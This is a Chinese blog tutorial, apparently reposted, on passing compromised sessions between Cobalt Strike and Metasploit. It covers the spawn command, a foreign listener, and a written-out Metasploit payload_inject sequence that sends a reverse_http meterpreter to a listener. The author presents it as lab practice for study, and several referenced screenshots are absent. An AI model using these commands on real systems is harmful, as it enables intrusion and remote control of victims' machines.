标签：spawn set Cobalt CS 监听器 Strike MSF payload

文中通过详细讲解CobaltStrike工具，更加深入的掌握CobaltStrike用法；文中内容全由个人理解编制，若有错处，大佬勿喷，个人学艺不精；本文中提到的任何技术都源自于靶场练习，仅供学习参考，请勿利用文章内的相关技术从事非法测试，如因产生的一切不良后果与文章作者无关。

Cobalt Strike 与 MSF联动

使用 spawn 命令来为一个监听器派生一个会话。此 spawn 命令接受一个架构（如：x86，x64）和一个监听器作为其参数。默认情况下， spawn 命令会在 rundll32.exe 中派生一个会话。
首先新建立了一个9999端口的监听器：

spawn 监听器名

使用spawn生成新的会话，而且这个会话调用的是rundll32.exe,是在内存中运行的dll文件：

在我们的渗透测试中，通常会使用到将CS生成的session派生至我们的MSF中，反之也是一样。
注：这里不论是CS->MSF 还是MSF->CS ,在MSF中使用的payload都是HTTP的，而非TCP：

CS->MSF：

我们首先在MSF建立监听：

在CS中使用foreign建立外部监听：

然后利用spawn将CS会话派生至MSF中：

spawn CS->MSF 

MSF ->CS

将msf中的session反弹到CS上，我们需要使用 payload_inject 模块：

use windows/local/payload_inject
set disablepayloadhandler true # 注：这条很重要，主要目的是禁止msf监听
set payload windows/meterpreter/reverse_http
set lhost 192.168.1.7
set lport 7777
set session 1
exploit

同样在CS中建立一个监听：

执行后，成功回连：

标签：spawn,set,Cobalt,CS,监听器,Strike,MSF,payload
来源： https://blog.csdn.net/nicai321/article/details/122854360

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。